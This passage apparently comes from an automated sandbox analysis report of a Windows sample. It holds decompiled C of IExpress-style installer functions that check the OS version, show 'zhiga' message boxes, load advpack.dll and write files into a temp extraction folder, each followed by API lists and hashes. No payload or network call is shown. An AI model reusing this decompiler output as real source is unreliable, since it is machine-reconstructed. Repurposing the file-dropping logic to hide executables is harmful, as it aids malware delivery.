                                                          				CHAR* _t124;
                                                          				CHAR* _t129;
                                                          				signed int _t131;
                                                          				signed int _t132;
                                                          				CHAR* _t135;
                                                          				CHAR* _t138;
                                                          				signed int _t139;
                                                          
                                                          				_t72 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t72 ^ _t139;
                                                          				_v416.dwOSVersionInfoSize = 0x94;
                                                          				_t115 = __ecx;
                                                          				_t135 = 0;
                                                          				_v432 = __ecx;
                                                          				_t138 = 0;
                                                          				if(GetVersionExA( &_v416) != 0) {
                                                          					_t133 = _v416.dwMajorVersion;
                                                          					_t119 = 2;
                                                          					_t77 = _v416.dwPlatformId - 1;
                                                          					__eflags = _t77;
                                                          					if(_t77 == 0) {
                                                          						_t119 = 0;
                                                          						__eflags = 1;
                                                          						 *0x10c8184 = 1;
                                                          						 *0x10c8180 = 1;
                                                          						L13:
                                                          						 *0x10c9a40 = _t119;
                                                          						L14:
                                                          						__eflags =  *0x10c8a34 - _t138; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L66;
                                                          						}
                                                          						__eflags = _t115;
                                                          						if(_t115 == 0) {
                                                          							goto L66;
                                                          						}
                                                          						_v428 = _t135;
                                                          						__eflags = _t119;
                                                          						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                          						_t11 =  &_v420;
                                                          						 *_t11 = _v420 & _t138;
                                                          						__eflags =  *_t11;
                                                          						_v440 = _t115;
                                                          						do {
                                                          							_v424 = _t135 * 0x18;
                                                          							_v436 = E010C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                          							_t91 = E010C2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                          							_t123 = _v436;
                                                          							_t133 = 0x54d;
                                                          							__eflags = _t123;
                                                          							if(_t123 < 0) {
                                                          								L32:
                                                          								__eflags = _v420 - 1;
                                                          								if(_v420 == 1) {
                                                          									_t138 = 0x54c;
                                                          									L36:
                                                          									__eflags = _t138;
                                                          									if(_t138 != 0) {
                                                          										L40:
                                                          										__eflags = _t138 - _t133;
                                                          										if(_t138 == _t133) {
                                                          											L30:
                                                          											_v420 = _v420 & 0x00000000;
                                                          											_t115 = 0;
                                                          											_v436 = _v436 & 0x00000000;
                                                          											__eflags = _t138 - _t133;
                                                          											_t133 = _v432;
                                                          											if(__eflags != 0) {
                                                          												_t124 = _v440;
                                                          											} else {
                                                          												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                          												_v420 =  &_v268;
                                                          											}
                                                          											__eflags = _t124;
                                                          											if(_t124 == 0) {
                                                          												_t135 = _v436;
                                                          											} else {
                                                          												_t99 = _t124[0x30];
                                                          												_t135 = _t124[0x34] + 0x84 + _t133;
                                                          												__eflags = _t99 & 0x00000001;
                                                          												if((_t99 & 0x00000001) == 0) {
                                                          													asm("sbb ebx, ebx");
                                                          													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                          												} else {
                                                          													_t115 = 0x104;
                                                          												}
                                                          											}
                                                          											__eflags =  *0x10c8a38 & 0x00000001;
                                                          											if(( *0x10c8a38 & 0x00000001) != 0) {
                                                          												L64:
                                                          												_push(0);
                                                          												_push(0x30);
                                                          												_push(_v420);
                                                          												_push("zhiga");
                                                          												goto L65;
                                                          											} else {
                                                          												__eflags = _t135;
                                                          												if(_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												__eflags =  *_t135;
                                                          												if( *_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												MessageBeep(0);
                                                          												_t94 = E010C681F(_t115);
                                                          												__eflags = _t94;
                                                          												if(_t94 == 0) {
                                                          													L57:
                                                          													0x180030 = 0x30;
                                                          													L58:
                                                          													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                          													__eflags = _t115 & 0x00000004;
                                                          													if((_t115 & 0x00000004) == 0) {
                                                          														__eflags = _t115 & 0x00000001;
                                                          														if((_t115 & 0x00000001) == 0) {
                                                          															goto L66;
                                                          														}
                                                          														__eflags = _t97 - 1;
                                                          														L62:
                                                          														if(__eflags == 0) {
                                                          															_t138 = 0;
                                                          														}
                                                          														goto L66;
                                                          													}
                                                          													__eflags = _t97 - 6;
                                                          													goto L62;
                                                          												}
                                                          												_t98 = E010C67C9(_t124, _t124);
                                                          												__eflags = _t98;
                                                          												if(_t98 == 0) {
                                                          													goto L57;
                                                          												}
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags = _t138 - 0x54c;
                                                          										if(_t138 == 0x54c) {
                                                          											goto L30;
                                                          										}
                                                          										__eflags = _t138;
                                                          										if(_t138 == 0) {
                                                          											goto L66;
                                                          										}
                                                          										_t135 = 0;
                                                          										__eflags = 0;
                                                          										goto L44;
                                                          									}
                                                          									L37:
                                                          									_t129 = _v432;
                                                          									__eflags = _t129[0x7c];
                                                          									if(_t129[0x7c] == 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t133 =  &_v268;
                                                          									_t104 = E010C28E8(_t129,  &_v268, _t129,  &_v428);
                                                          									__eflags = _t104;
                                                          									if(_t104 != 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t135 = _v428;
                                                          									_t133 = 0x54d;
                                                          									_t138 = 0x54d;
                                                          									goto L40;
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							__eflags = _t91;
                                                          							if(_t91 > 0) {
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _t123;
                                                          							if(_t123 != 0) {
                                                          								__eflags = _t91;
                                                          								if(_t91 != 0) {
                                                          									goto L37;
                                                          								}
                                                          								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                          								L27:
                                                          								if(__eflags <= 0) {
                                                          									goto L37;
                                                          								}
                                                          								L28:
                                                          								__eflags = _t135;
                                                          								if(_t135 == 0) {
                                                          									goto L33;
                                                          								}
                                                          								_t138 = 0x54c;
                                                          								goto L30;
                                                          							}
                                                          							__eflags = _t91;
                                                          							_t107 = _v416.dwBuildNumber;
                                                          							if(_t91 != 0) {
                                                          								_t131 = _v424;
                                                          								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                          								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                          									goto L37;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          							_t132 = _t107 & 0x0000ffff;
                                                          							_t109 = _v424;
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                          							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                          								goto L28;
                                                          							}
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                          							goto L27;
                                                          							L33:
                                                          							_t135 =  &(_t135[1]);
                                                          							_v428 = _t135;
                                                          							_v420 = _t135;
                                                          							__eflags = _t135 - 2;
                                                          						} while (_t135 < 2);
                                                          						goto L36;
                                                          					}
                                                          					__eflags = _t77 == 1;
                                                          					if(_t77 == 1) {
                                                          						 *0x10c9a40 = _t119;
                                                          						 *0x10c8184 = 1;
                                                          						 *0x10c8180 = 1;
                                                          						__eflags = _t133 - 3;
                                                          						if(_t133 > 3) {
                                                          							__eflags = _t133 - 5;
                                                          							if(_t133 < 5) {
                                                          								goto L14;
                                                          							}
                                                          							_t113 = 3;
                                                          							_t119 = _t113;
                                                          							goto L13;
                                                          						}
                                                          						_t119 = 1;
                                                          						_t114 = 3;
                                                          						 *0x10c9a40 = 1;
                                                          						__eflags = _t133 - _t114;
                                                          						if(__eflags < 0) {
                                                          							L9:
                                                          							 *0x10c8184 = _t135;
                                                          							 *0x10c8180 = _t135;
                                                          							goto L14;
                                                          						}
                                                          						if(__eflags != 0) {
                                                          							goto L14;
                                                          						}
                                                          						__eflags = _v416.dwMinorVersion - 0x33;
                                                          						if(_v416.dwMinorVersion >= 0x33) {
                                                          							goto L14;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					_t138 = 0x4ca;
                                                          					goto L44;
                                                          				} else {
                                                          					_t138 = 0x4b4;
                                                          					L44:
                                                          					_push(_t135);
                                                          					_push(0x10);
                                                          					_push(_t135);
                                                          					_push(_t135);
                                                          					L65:
                                                          					_t133 = _t138;
                                                          					E010C44B9(0, _t138);
                                                          					L66:
                                                          					return E010C6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010C3723
                                                          • MessageBeep.USER32(00000000), ref: 010C39C3
                                                          • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 010C39F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Message$BeepVersion
                                                          • String ID: 3$zhiga
                                                          • API String ID: 2519184315-2183486482
                                                          • Opcode ID: 05fb130d9572896257e65e97236a30acac1ab042916923c061471cc3d0229601
                                                          • Instruction ID: a5317139c453a682901e51776ec296d28f4afefbdfde0006dce0a10c4d38c7f8
                                                          • Opcode Fuzzy Hash: 05fb130d9572896257e65e97236a30acac1ab042916923c061471cc3d0229601
                                                          • Instruction Fuzzy Hash: 0191C271E212259FEBB58B19C9807EEB7E0FB85B04F0581EDD9CA9F281D73589808F41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E010C6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				signed int _t9;
                                                          				signed char _t14;
                                                          				struct HINSTANCE__* _t15;
                                                          				void* _t18;
                                                          				CHAR* _t26;
                                                          				void* _t27;
                                                          				signed int _t28;
                                                          
                                                          				_t27 = __esi;
                                                          				_t18 = __ebx;
                                                          				_t9 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t9 ^ _t28;
                                                          				_push(__ecx);
                                                          				E010C1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          				_t26 = "advpack.dll";
                                                          				E010C658A( &_v268, 0x104, _t26);
                                                          				_t14 = GetFileAttributesA( &_v268);
                                                          				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                          					_t15 = LoadLibraryA(_t26);
                                                          				} else {
                                                          					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                          				}
                                                          				return E010C6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                          			}














                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010C64DF
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010C64F9
                                                          • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010C6502
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AttributesFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                          • API String ID: 438848745-2381869747
                                                          • Opcode ID: c7eaee630fed5456735f18ac10031666d0dd745f86175a25c70e623f9ebd6cfe
                                                          • Instruction ID: b324ee28ebb416e9515ee1f6581a79a3ab46061cae8f2e077cfe5d0155788814
                                                          • Opcode Fuzzy Hash: c7eaee630fed5456735f18ac10031666d0dd745f86175a25c70e623f9ebd6cfe
                                                          • Instruction Fuzzy Hash: BA01A230A001089FD7709B64D849AEE7778EBA4B10F60019DB9C5932C4DF76AA858F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                          				void* _v8;
                                                          				char* _v12;
                                                          				intOrPtr _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				void* _v36;
                                                          				int _v40;
                                                          				void* _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				long _t68;
                                                          				void* _t70;
                                                          				void* _t73;
                                                          				void* _t79;
                                                          				void* _t83;
                                                          				void* _t87;
                                                          				void* _t88;
                                                          				intOrPtr _t93;
                                                          				intOrPtr _t97;
                                                          				intOrPtr _t99;
                                                          				int _t101;
                                                          				void* _t103;
                                                          				void* _t106;
                                                          				void* _t109;
                                                          				void* _t110;
                                                          
                                                          				_v12 = __edx;
                                                          				_t99 = __ecx;
                                                          				_t106 = 0;
                                                          				_v16 = __ecx;
                                                          				_t87 = 0;
                                                          				_t103 = 0;
                                                          				_v20 = 0;
                                                          				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                          					L19:
                                                          					_t106 = 1;
                                                          				} else {
                                                          					_t62 = 0;
                                                          					_v8 = 0;
                                                          					while(1) {
                                                          						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                          						if(E010C2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                          							goto L20;
                                                          						}
                                                          						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                          						_v28 = _t68;
                                                          						if(_t68 == 0) {
                                                          							_t99 = _v16;
                                                          							_t70 = _v8 + _t99;
                                                          							_t93 = _v24;
                                                          							_t87 = _v20;
                                                          							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                          								goto L18;
                                                          							}
                                                          						} else {
                                                          							_t103 = GlobalAlloc(0x42, _t68);
                                                          							if(_t103 != 0) {
                                                          								_t73 = GlobalLock(_t103);
                                                          								_v36 = _t73;
                                                          								if(_t73 != 0) {
                                                          									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                          										L15:
                                                          										GlobalUnlock(_t103);
                                                          										_t99 = _v16;
                                                          										L18:
                                                          										_t87 = _t87 + 1;
                                                          										_t62 = _v8 + 0x3c;
                                                          										_v20 = _t87;
                                                          										_v8 = _v8 + 0x3c;
                                                          										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                          											continue;
                                                          										} else {
                                                          											goto L19;
                                                          										}
                                                          									} else {
                                                          										_t79 = _v44;
                                                          										_t88 = _t106;
                                                          										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                          										_t101 = _v28;
                                                          										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                          										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                          										_t97 = _v48;
                                                          										_v36 = _t83;
                                                          										_t109 = _t83;
                                                          										do {
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                          											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010C2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                          											_t109 = _t109 + 0x18;
                                                          											_t88 = _t88 + 4;
                                                          										} while (_t88 < 8);
                                                          										_t87 = _v20;
                                                          										_t106 = 0;
                                                          										if(_v56 < 0 || _v64 > 0) {
                                                          											if(_v52 < _t106 || _v60 > _t106) {
                                                          												GlobalUnlock(_t103);
                                                          											} else {
                                                          												goto L15;
                                                          											}
                                                          										} else {
                                                          											goto L15;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          				}
                                                          				L20:
                                                          				 *_a8 = _t87;
                                                          				if(_t103 != 0) {
                                                          					GlobalFree(_t103);
                                                          				}
                                                          				return _t106;
                                                          			}


































                                                          APIs
                                                          • GlobalFree.KERNEL32 ref: 010C2A6F
                                                            • Part of subcall function 010C2773: CharUpperA.USER32(4B13CF70,00000000,00000000,00000000), ref: 010C27A8
                                                            • Part of subcall function 010C2773: CharNextA.USER32(0000054D), ref: 010C27B5
                                                            • Part of subcall function 010C2773: CharNextA.USER32(00000000), ref: 010C27BC
                                                            • Part of subcall function 010C2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2829
                                                            • Part of subcall function 010C2773: RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2852
                                                            • Part of subcall function 010C2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C2870
                                                            • Part of subcall function 010C2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010C28A0
                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010C3938,?,?,?,?,-00000005), ref: 010C2958
                                                          • GlobalLock.KERNEL32 ref: 010C2969
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010C3938,?,?,?,?,-00000005,?), ref: 010C2A21
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010C2A81
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                          • String ID:
                                                          • API String ID: 3949799724-0
                                                          • Opcode ID: 8dfced75566adba94798dd926fb997af106f76f8a6a7b350505fcd594126cbbf
                                                          • Instruction ID: 2e9ea8abf702e535e6095eecf1a111e314a110f3e4b37a403b89acbb7c36d1b3
                                                          • Opcode Fuzzy Hash: 8dfced75566adba94798dd926fb997af106f76f8a6a7b350505fcd594126cbbf
                                                          • Instruction Fuzzy Hash: 36512731A0021AEFDB21CF9DC884AAEBBB5FF48B10F14416EE985E3651DB359941CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E010C4169(void* __eflags) {
                                                          				int _t18;
                                                          				void* _t21;
                                                          
                                                          				_t20 = E010C468F("FINISHMSG", 0, 0);
                                                          				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                          				if(_t21 != 0) {
                                                          					if(E010C468F("FINISHMSG", _t21, _t20) != 0) {
                                                          						if(lstrcmpA(_t21, "<None>") == 0) {
                                                          							L7:
                                                          							return LocalFree(_t21);
                                                          						}
                                                          						_push(0);
                                                          						_push(0x40);
                                                          						_push(0);
                                                          						_push(_t21);
                                                          						_t18 = 0x3e9;
                                                          						L6:
                                                          						E010C44B9(0, _t18);
                                                          						goto L7;
                                                          					}
                                                          					_push(0);
                                                          					_push(0x10);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t18 = 0x4b1;
                                                          					goto L6;
                                                          				}
                                                          				return E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          			}






                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010C30B4), ref: 010C4189
                                                          • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010C30B4), ref: 010C41E7
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$FINISHMSG
                                                          • API String ID: 3507850446-3091758298
                                                          • Opcode ID: 30bc9f99feb7488ef3751e3647d9716176f4530d8b59f3e0c5ef48c5c8442417
                                                          • Instruction ID: 2e4018577d0278d51eb9c27192e39ecc834dca5695a4e42084bbe37c39b52599
                                                          • Opcode Fuzzy Hash: 30bc9f99feb7488ef3751e3647d9716176f4530d8b59f3e0c5ef48c5c8442417
                                                          • Instruction Fuzzy Hash: 1F01DBB1700218AFF32517698CA4FAF658EEBD8E94F10402DBBC2E21849E68CC010AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                          				signed int _v8;
                                                          				char _v520;
                                                          				void* __esi;
                                                          				signed int _t11;
                                                          				void* _t14;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				void* _t33;
                                                          				struct HWND__* _t34;
                                                          				signed int _t35;
                                                          
                                                          				_t33 = __edi;
                                                          				_t27 = __ebx;
                                                          				_t11 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t11 ^ _t35;
                                                          				_t34 = _a4;
                                                          				_t14 = _a8 - 0x110;
                                                          				if(_t14 == 0) {
                                                          					_t32 = GetDesktopWindow();
                                                          					E010C43D0(_t34, _t15);
                                                          					_v520 = 0;
                                                          					LoadStringA( *0x10c9a3c, _a16,  &_v520, 0x200);
                                                          					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                          					MessageBeep(0xffffffff);
                                                          					goto L6;
                                                          				} else {
                                                          					if(_t14 != 1) {
                                                          						L4:
                                                          						_t23 = 0;
                                                          					} else {
                                                          						_t32 = _a12;
                                                          						if(_t32 - 0x83d > 1) {
                                                          							goto L4;
                                                          						} else {
                                                          							EndDialog(_t34, _t32);
                                                          							L6:
                                                          							_t23 = 1;
                                                          						}
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                          			}














                                                          APIs
                                                          • EndDialog.USER32(?,?), ref: 010C1A18
                                                          • GetDesktopWindow.USER32 ref: 010C1A24
                                                          • LoadStringA.USER32(?,?,00000200), ref: 010C1A4F
                                                          • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010C1A62
                                                          • MessageBeep.USER32(000000FF), ref: 010C1A6A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                          • String ID:
                                                          • API String ID: 1273765764-0
                                                          • Opcode ID: efcaa6e6787844b1491c7e623b0eee2063954710732cee2aa983b7bb485ad902
                                                          • Instruction ID: 683b930f9ac0aaea23c5dc2daa5543969940a45f927378d4a660dadb8730dbd5
                                                          • Opcode Fuzzy Hash: efcaa6e6787844b1491c7e623b0eee2063954710732cee2aa983b7bb485ad902
                                                          • Instruction Fuzzy Hash: CA118E31A0010DEFDB20EF68D908AAE77F8EB89750F008199E99693185DA359E01CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E010C63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				long _v272;
                                                          				void* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t15;
                                                          				long _t28;
                                                          				struct _OVERLAPPED* _t37;
                                                          				void* _t39;
                                                          				signed int _t40;
                                                          
                                                          				_t15 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t15 ^ _t40;
                                                          				_v272 = _v272 & 0x00000000;
                                                          				_push(__ecx);
                                                          				_v276 = _a16;
                                                          				_t37 = 1;
                                                          				E010C1781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          				E010C658A( &_v268, 0x104, _a12);
                                                          				_t28 = 0;
                                                          				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                          				if(_t39 != 0xffffffff) {
                                                          					_t28 = _a4;
                                                          					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                          						 *0x10c9124 = 0x80070052;
                                                          						_t37 = 0;
                                                          					}
                                                          					CloseHandle(_t39);
                                                          				} else {
                                                          					 *0x10c9124 = 0x80070052;
                                                          					_t37 = 0;
                                                          				}
                                                          				return E010C6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                          			}
















                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C642D
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C645B
                                                          • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C647A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C63EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
